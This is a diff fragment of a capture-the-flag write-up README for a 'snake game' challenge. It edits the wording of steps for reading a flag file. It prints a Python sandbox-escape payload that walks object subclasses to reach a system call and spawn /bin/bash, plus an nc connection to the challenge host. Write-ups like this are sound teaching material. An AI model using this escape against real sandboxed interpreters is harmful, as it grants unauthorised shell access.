zavinator/ctf-public/2024-The-Catch/snake_game/README.md

 Enter your code : ().__class__.__mro__[1].__subclasses__()[140].__init__.__globals__["System".lower()]("/bin/bash")
 ```

-Once we obtained a shell, we explored the file system and discovered the `/flag.txt` file but reading it directly with cat didn't work due to some redirection.
+Once we obtained a shell, we explored the file system and discovered the `/flag.txt` file but reading it directly with cat didn't work (maybe cat not available).

-### 3. Bypassing Output Redirection
+### 3. Printing The Flag

-To bypass the output redirection, we invoked Python and read the flag:
+To print the flag, we invoked Python and read the flag:

 ```bash
 nc snakegame.leisure.tcc 23001